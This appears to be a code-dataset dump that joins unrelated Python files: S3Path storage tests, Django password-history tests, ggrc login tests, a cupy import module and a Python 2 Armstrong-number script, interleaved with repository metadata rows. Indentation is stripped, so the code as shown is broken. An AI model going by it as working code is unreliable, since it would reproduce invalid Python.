assert path.stat() is None
def test_exists(s3_mock):
path = S3Path('./fake-key')
with pytest.raises(ValueError):
path.exists()
path = S3Path('/fake-bucket/fake-key')
with pytest.raises(ClientError):
path.exists()
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
assert not S3Path('/test-bucket/Test.test').exists()
path = S3Path('/test-bucket/directory/Test.test')
assert path.exists()
for parent in path.parents:
assert parent.exists()
def test_glob(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
assert list(S3Path('/test-bucket/').glob('*.test')) == []
assert list(S3Path('/test-bucket/directory/').glob('*.test')) == [S3Path('/test-bucket/directory/Test.test')]
assert list(S3Path('/test-bucket/').glob('**/*.test')) == [S3Path('/test-bucket/directory/Test.test')]
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('*.py')) == [
S3Path('/test-bucket/pathlib.py'),
S3Path('/test-bucket/setup.py'),
S3Path('/test-bucket/test_pathlib.py')]
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('*/*.py')) == [S3Path('/test-bucket/docs/conf.py')]
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('**/*.py')) == [
S3Path('/test-bucket/build/lib/pathlib.py'),
S3Path('/test-bucket/docs/conf.py'),
S3Path('/test-bucket/pathlib.py'),
S3Path('/test-bucket/setup.py'),
S3Path('/test-bucket/test_pathlib.py')]
assert sorted(S3Path.from_uri('s3://test-bucket/').glob('*cs')) == [
S3Path('/test-bucket/docs/'),
]
def test_rglob(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
assert list(S3Path('/test-bucket/').rglob('*.test')) == [S3Path('/test-bucket/directory/Test.test')]
assert list(S3Path('/test-bucket/').rglob('**/*.test')) == [S3Path('/test-bucket/directory/Test.test')]
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert sorted(S3Path.from_uri('s3://test-bucket/').rglob('*.py')) == [
S3Path('/test-bucket/build/lib/pathlib.py'),
S3Path('/test-bucket/docs/conf.py'),
S3Path('/test-bucket/pathlib.py'),
S3Path('/test-bucket/setup.py'),
S3Path('/test-bucket/test_pathlib.py')]
def test_is_dir(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert not S3Path('/test-bucket/fake.test').is_dir()
assert not S3Path('/test-bucket/fake/').is_dir()
assert S3Path('/test-bucket/directory').is_dir()
assert not S3Path('/test-bucket/directory/Test.test').is_dir()
assert not S3Path('/test-bucket/pathlib.py').is_dir()
assert not S3Path('/test-bucket/docs/conf.py').is_dir()
assert S3Path('/test-bucket/docs/').is_dir()
assert S3Path('/test-bucket/build/').is_dir()
assert S3Path('/test-bucket/build/lib').is_dir()
assert not S3Path('/test-bucket/build/lib/pathlib.py').is_dir()
def test_is_file(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
assert not S3Path('/test-bucket/fake.test').is_file()
assert not S3Path('/test-bucket/fake/').is_file()
assert not S3Path('/test-bucket/directory').is_file()
assert S3Path('/test-bucket/directory/Test.test').is_file()
assert S3Path('/test-bucket/pathlib.py').is_file()
assert S3Path('/test-bucket/docs/conf.py').is_file()
assert not S3Path('/test-bucket/docs/').is_file()
assert not S3Path('/test-bucket/build/').is_file()
assert not S3Path('/test-bucket/build/lib').is_file()
assert S3Path('/test-bucket/build/lib/pathlib.py').is_file()
def test_read_line(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
assert fp.readline() == "test data"
assert fp.readline() == "test data"
assert fp.readline() == ""
def test_read_lines(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
assert len(fp.readlines()) == 2
def test_read_lines_hint(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
assert len(fp.readlines(1)) == 1
def test_iter_lines(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data\ntest data')
with S3Path('/test-bucket/directory/Test.test').open("r") as fp:
for line in fp:
assert line == "test data"
def test_write_lines(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
path = S3Path('/test-bucket/directory/Test.test')
with path.open("w") as fp:
fp.writelines(["line 1\n", "line 2\n"])
res = path.read_text().splitlines()
assert len(res) == 2
def test_iterdir(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'setup.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'test_pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'build/lib/pathlib.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
s3_path = S3Path('/test-bucket/docs')
assert sorted(s3_path.iterdir()) == [
S3Path('/test-bucket/docs/Makefile'),
S3Path('/test-bucket/docs/_build'),
S3Path('/test-bucket/docs/_static'),
S3Path('/test-bucket/docs/_templates'),
S3Path('/test-bucket/docs/conf.py'),
S3Path('/test-bucket/docs/index.rst'),
S3Path('/test-bucket/docs/make.bat'),
]
def test_iterdir_on_buckets(s3_mock):
s3 = boto3.resource('s3')
for index in range(4):
s3.create_bucket(Bucket='test-bucket{}'.format(index))
s3_root_path = S3Path('/')
assert sorted(s3_root_path.iterdir()) == [
S3Path('/test-bucket{}'.format(index))
for index in range(4)
]
def test_open_for_reading(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
file_obj = path.open()
assert file_obj.read() == 'test data'
def test_open_for_write(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
bucket = s3.Bucket('test-bucket')
assert sum(1 for _ in bucket.objects.all()) == 0
path = S3Path('/test-bucket/directory/Test.test')
file_obj = path.open(mode='bw')
assert file_obj.writable()
file_obj.write(b'test data\n')
file_obj.writelines([b'test data'])
assert sum(1 for _ in bucket.objects.all()) == 1
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
streaming_body = object_summary.get()['Body']
assert list(streaming_body.iter_lines()) == [
b'test data',
b'test data'
]
def test_open_binary_read(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
with path.open(mode='br') as file_obj:
assert file_obj.readlines() == [b'test data']
with path.open(mode='rb') as file_obj:
assert file_obj.readline() == b'test data'
assert file_obj.readline() == b''
assert file_obj.readline() == b''
@pytest.mark.skipif(sys.version_info < (3, 5), reason="requires python3.5 or higher")
def test_read_bytes(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
assert path.read_bytes() == b'test data'
def test_open_text_read(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
with path.open(mode='r') as file_obj:
assert file_obj.readlines() == ['test data']
with path.open(mode='rt') as file_obj:
assert file_obj.readline() == 'test data'
assert file_obj.readline() == ''
assert file_obj.readline() == ''
@pytest.mark.skipif(sys.version_info < (3, 5), reason="requires python3.5 or higher")
def test_read_text(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
assert path.read_text() == 'test data'
def test_owner(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'directory/Test.test')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/directory/Test.test')
assert path.owner() == 'webfile'
def test_rename_s3_to_s3(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
s3.create_bucket(Bucket='target-bucket')
S3Path('/test-bucket/docs/conf.py').rename('/test-bucket/docs/conf1.py')
assert not S3Path('/test-bucket/docs/conf.py').exists()
assert S3Path('/test-bucket/docs/conf1.py').is_file()
path = S3Path('/test-bucket/docs/')
path.rename(S3Path('/target-bucket') / S3Path('folder'))
assert not path.exists()
assert S3Path('/target-bucket/folder/conf1.py').is_file()
assert S3Path('/target-bucket/folder/make.bat').is_file()
assert S3Path('/target-bucket/folder/index.rst').is_file()
assert S3Path('/target-bucket/folder/Makefile').is_file()
assert S3Path('/target-bucket/folder/_templates/11conf.py').is_file()
assert S3Path('/target-bucket/folder/_build/22conf.py').is_file()
assert S3Path('/target-bucket/folder/_static/conf.py').is_file()
def test_replace_s3_to_s3(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
s3.create_bucket(Bucket='target-bucket')
S3Path('/test-bucket/docs/conf.py').replace('/test-bucket/docs/conf1.py')
assert not S3Path('/test-bucket/docs/conf.py').exists()
assert S3Path('/test-bucket/docs/conf1.py').is_file()
path = S3Path('/test-bucket/docs/')
path.replace(S3Path('/target-bucket') / S3Path('folder'))
assert not path.exists()
assert S3Path('/target-bucket/folder/conf1.py').is_file()
assert S3Path('/target-bucket/folder/make.bat').is_file()
assert S3Path('/target-bucket/folder/index.rst').is_file()
assert S3Path('/target-bucket/folder/Makefile').is_file()
assert S3Path('/target-bucket/folder/_templates/11conf.py').is_file()
assert S3Path('/target-bucket/folder/_build/22conf.py').is_file()
assert S3Path('/target-bucket/folder/_static/conf.py').is_file()
def test_rmdir(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'docs/conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/make.bat')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/index.rst')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/Makefile')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_templates/11conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_build/22conf.py')
object_summary.put(Body=b'test data')
object_summary = s3.ObjectSummary('test-bucket', 'docs/_static/conf.py')
object_summary.put(Body=b'test data')
conf_path = S3Path('/test-bucket/docs/_templates')
assert conf_path.is_dir()
conf_path.rmdir()
assert not conf_path.exists()
path = S3Path('/test-bucket/docs/')
path.rmdir()
assert not path.exists()
def test_mkdir(s3_mock):
s3 = boto3.resource('s3')
S3Path('/test-bucket/').mkdir()
assert s3.Bucket('test-bucket') in s3.buckets.all()
S3Path('/test-bucket/').mkdir(exist_ok=True)
with pytest.raises(FileExistsError):
S3Path('/test-bucket/').mkdir(exist_ok=False)
with pytest.raises(FileNotFoundError):
S3Path('/test-second-bucket/test-directory/file.name').mkdir()
S3Path('/test-second-bucket/test-directory/file.name').mkdir(parents=True)
assert s3.Bucket('test-second-bucket') in s3.buckets.all()
def test_write_text(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'temp_key')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/temp_key')
data = path.read_text()
assert isinstance(data, str)
path.write_text(data)
assert path.read_text() == data
def test_write_bytes(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'temp_key')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/temp_key')
data = path.read_bytes()
assert isinstance(data, bytes)
path.write_bytes(data)
assert path.read_bytes() == data
def test_unlink(s3_mock):
s3 = boto3.resource('s3')
s3.create_bucket(Bucket='test-bucket')
object_summary = s3.ObjectSummary('test-bucket', 'temp_key')
object_summary.put(Body=b'test data')
path = S3Path('/test-bucket/temp_key')
subdir_key = S3Path('/test-bucket/fake_folder/some_key')
subdir_key.write_text("some text")
assert path.exists() is True
assert subdir_key.exists() is True
path.unlink()
assert path.exists() is False
with pytest.raises(FileNotFoundError):
S3Path("/test-bucket/fake_subfolder/fake_subkey").unlink()
with pytest.raises(IsADirectoryError):
S3Path("/test-bucket/fake_folder").unlink()
with pytest.raises(IsADirectoryError):
S3Path("/fake-bucket/").unlink()
| 38.122414 | 113 | 0.684727 | 3,071 | 22,111 | 4.793878 | 0.056985 | 0.133134 | 0.095639 | 0.13884 | 0.847779 | 0.820065 | 0.781483 | 0.742902 | 0.717973 | 0.69875 | 0 | 0.021747 | 0.149428 | 22,111 | 579 | 114 | 38.188256 | 0.761046 | 0.005563 | 0 | 0.602198 | 0 | 0 | 0.2878 | 0.122271 | 0 | 0 | 0 | 0.001727 | 0.215385 | 1 | 0.061538 | false | 0 | 0.017582 | 0 | 0.079121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
37de304d510e1a11209a1d69db17fbdc065f98a8 | 32 | py | Python | build/lib/PyodbcListOfDicts/__init__.py | dariyush/PyodbcListOfDicts | 2143cc787bc367ca03670d3d458bb9382fbbcd62 | [
"MIT"
] | 1 | 2019-10-23T21:03:07.000Z | 2019-10-23T21:03:07.000Z | build/lib/PyodbcListOfDicts/__init__.py | dariyush/PyodbcListOfDicts | 2143cc787bc367ca03670d3d458bb9382fbbcd62 | [
"MIT"
] | null | null | null | build/lib/PyodbcListOfDicts/__init__.py | dariyush/PyodbcListOfDicts | 2143cc787bc367ca03670d3d458bb9382fbbcd62 | [
"MIT"
] | null | null | null | from .PyodbcListOfDicts import * | 32 | 32 | 0.84375 | 3 | 32 | 9 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.09375 | 32 | 1 | 32 | 32 | 0.931034 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
37fc7fd3a054326cd30d884615670adb880666fc | 2,603 | py | Python | cfgov/v1/tests/test_signals.py | Mario-Kart-Felix/cfgov-refresh | 7978fedeb7aaf4d96a87720e6545567085e056a9 | [
"CC0-1.0"
] | 1 | 2019-12-29T17:50:07.000Z | 2019-12-29T17:50:07.000Z | cfgov/v1/tests/test_signals.py | ascott1/cfgov-refresh | 9c916aaed3a48110a199eb4675474290a51f815d | [
"CC0-1.0"
] | 1 | 2021-04-22T01:09:52.000Z | 2021-04-22T01:09:52.000Z | cfgov/v1/tests/test_signals.py | ascott1/cfgov-refresh | 9c916aaed3a48110a199eb4675474290a51f815d | [
"CC0-1.0"
] | 1 | 2021-02-02T08:59:38.000Z | 2021-02-02T08:59:38.000Z | from django.contrib.auth.models import User
from django.utils import timezone
from model_mommy import mommy
from unittest import TestCase
class UserSaveTestCase(TestCase):
def make_user(self, password, is_superuser=False):
user = mommy.prepare(User, is_superuser=is_superuser)
user.set_password(password)
user.save()
return user
def test_user_save_new_password_makes_history_item(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
user.set_password('bar')
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertNotEqual(first_phi, new_phi)
self.assertEqual(user.password, new_phi.encrypted_password)
def test_user_save_new_password_not_expired(self):
user = self.make_user(password='foo')
user.set_password('bar')
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertGreater(new_phi.expires_at, timezone.now())
def test_user_save_new_password_locks_password(self):
user = self.make_user(password='foo')
user.set_password('bar')
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertGreater(new_phi.locked_until, timezone.now())
def test_user_save_same_password_no_history_item(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
user.save()
new_phi = user.passwordhistoryitem_set.latest()
self.assertEqual(first_phi, new_phi)
self.assertEqual(user.password, new_phi.encrypted_password)
def test_user_created_expires_password(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
self.assertLess(first_phi.expires_at, timezone.now())
def test_user_created_unlocks_password(self):
user = self.make_user(password='foo')
first_phi = user.passwordhistoryitem_set.latest()
self.assertLess(first_phi.locked_until, timezone.now())
def test_superuser_created_does_not_expire_password(self):
user = self.make_user(password='foo', is_superuser=True)
first_phi = user.passwordhistoryitem_set.latest()
self.assertGreater(first_phi.expires_at, timezone.now())
def test_superuser_created_unlocks_password(self):
user = self.make_user(password='foo', is_superuser=True)
first_phi = user.passwordhistoryitem_set.latest()
self.assertLess(first_phi.locked_until, timezone.now())
| 37.185714 | 67 | 0.713023 | 326 | 2,603 | 5.377301 | 0.174847 | 0.054763 | 0.148317 | 0.165431 | 0.79806 | 0.79806 | 0.74729 | 0.719338 | 0.659441 | 0.6332 | 0 | 0 | 0.189397 | 2,603 | 69 | 68 | 37.724638 | 0.830806 | 0 | 0 | 0.566038 | 0 | 0 | 0.012678 | 0 | 0 | 0 | 0 | 0 | 0.188679 | 1 | 0.169811 | false | 0.622642 | 0.075472 | 0 | 0.283019 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
532d30f81f1f4682a2f43b12afe253fd93f3a1d6 | 285 | py | Python | cupy/io/__init__.py | weareno1/cupy | ac52cce00b69d97b5d99bd1f91caed720b32b2d3 | [
"MIT"
] | 1 | 2020-11-24T03:44:35.000Z | 2020-11-24T03:44:35.000Z | cupy/io/__init__.py | hephaex/cupy | 5cf50a93bbdebe825337ed7996c464e84b1495ba | [
"MIT"
] | 1 | 2019-08-05T09:36:13.000Z | 2019-08-06T12:03:01.000Z | cupy/io/__init__.py | hephaex/cupy | 5cf50a93bbdebe825337ed7996c464e84b1495ba | [
"MIT"
] | 1 | 2022-03-24T13:19:55.000Z | 2022-03-24T13:19:55.000Z | # Functions from the following NumPy document
# https://docs.scipy.org/doc/numpy/reference/routines.io.html
# "NOQA" to suppress flake8 warning
from cupy.io import formatting # NOQA
from cupy.io import npz # NOQA
from cupy.io import rawfile # NOQA
from cupy.io import text # NOQA
| 31.666667 | 61 | 0.761404 | 45 | 285 | 4.822222 | 0.577778 | 0.147465 | 0.184332 | 0.294931 | 0.276498 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004149 | 0.154386 | 285 | 8 | 62 | 35.625 | 0.896266 | 0.550877 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5344d61b2c4d56baaa6c4b1355ae60a1f529cebd | 2,416 | py | Python | test/unit/ggrc/test_login.py | mrR2D2/ggrc-core | f4f92628de4490512fcc9511be28e6cf1b875e14 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/unit/ggrc/test_login.py | mrR2D2/ggrc-core | f4f92628de4490512fcc9511be28e6cf1b875e14 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/unit/ggrc/test_login.py | mrR2D2/ggrc-core | f4f92628de4490512fcc9511be28e6cf1b875e14 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2020-02-13T12:32:45.000Z | 2020-02-13T12:32:45.000Z | # Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Unit test suite for login __init__."""
import unittest
import mock
from ggrc import login
class TestIsExternalAppUser(unittest.TestCase):
"""Unittests for is_external_app_user function."""
@mock.patch('ggrc.login._get_current_logged_user')
def test_no_logged_in_user(self, current_user_mock):
"""No logged in user presented."""
current_user_mock.return_value = None
self.assertFalse(login.is_external_app_user())
current_user_mock.assert_called_once_with()
@mock.patch('ggrc.login._get_current_logged_user')
def test_anonymous_user(self, current_user_mock):
"""Currently logged in user is anonymous."""
user_mock = mock.MagicMock()
user_mock.is_anonymous.return_value = True
current_user_mock.return_value = user_mock
self.assertFalse(login.is_external_app_user())
current_user_mock.assert_called_once_with()
user_mock.is_anonymous.assert_called_once_with()
@mock.patch('ggrc.utils.user_generator.is_app_2_app_user_email')
@mock.patch('ggrc.login._get_current_logged_user')
def test_not_external_user(self, current_user_mock, is_external_email_mock):
"""Currently logged in user is not external app."""
user_mock = mock.MagicMock()
user_mock.email = 'user@example.com'
user_mock.is_anonymous.return_value = False
current_user_mock.return_value = user_mock
is_external_email_mock.return_value = False
self.assertFalse(login.is_external_app_user())
current_user_mock.assert_called_once_with()
user_mock.is_anonymous.assert_called_once_with()
is_external_email_mock.assert_called_once_with('user@example.com')
@mock.patch('ggrc.utils.user_generator.is_app_2_app_user_email')
@mock.patch('ggrc.login._get_current_logged_user')
def test_external_user(self, current_user_mock, is_external_email_mock):
"""Currently logged in user is external app."""
user_mock = mock.MagicMock()
user_mock.email = 'user@example.com'
user_mock.is_anonymous.return_value = False
current_user_mock.return_value = user_mock
is_external_email_mock.return_value = True
self.assertTrue(login.is_external_app_user())
current_user_mock.assert_called_once_with()
user_mock.is_anonymous.assert_called_once_with()
is_external_email_mock.assert_called_once_with('user@example.com')
| 40.949153 | 78 | 0.782285 | 356 | 2,416 | 4.870787 | 0.185393 | 0.119954 | 0.103806 | 0.103806 | 0.816609 | 0.777393 | 0.732411 | 0.712803 | 0.712803 | 0.712803 | 0 | 0.003761 | 0.119619 | 2,416 | 58 | 79 | 41.655172 | 0.811472 | 0.142798 | 0 | 0.682927 | 0 | 0 | 0.148112 | 0.116724 | 0 | 0 | 0 | 0 | 0.317073 | 1 | 0.097561 | false | 0 | 0.073171 | 0 | 0.195122 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
726e86f4ec6e982718ed6592729d317fbc87e92a | 116 | py | Python | test13.py | JarkJiao/Python_learning_TestCase | cc77a7a20b01e230e0edd818532570a7d8853b03 | [
"MIT"
] | null | null | null | test13.py | JarkJiao/Python_learning_TestCase | cc77a7a20b01e230e0edd818532570a7d8853b03 | [
"MIT"
] | null | null | null | test13.py | JarkJiao/Python_learning_TestCase | cc77a7a20b01e230e0edd818532570a7d8853b03 | [
"MIT"
] | null | null | null | for i in range(100,1000):
a = i /100
b = i/10%10
c = i %10
if(i == a**3+b**3+c**3):
print i
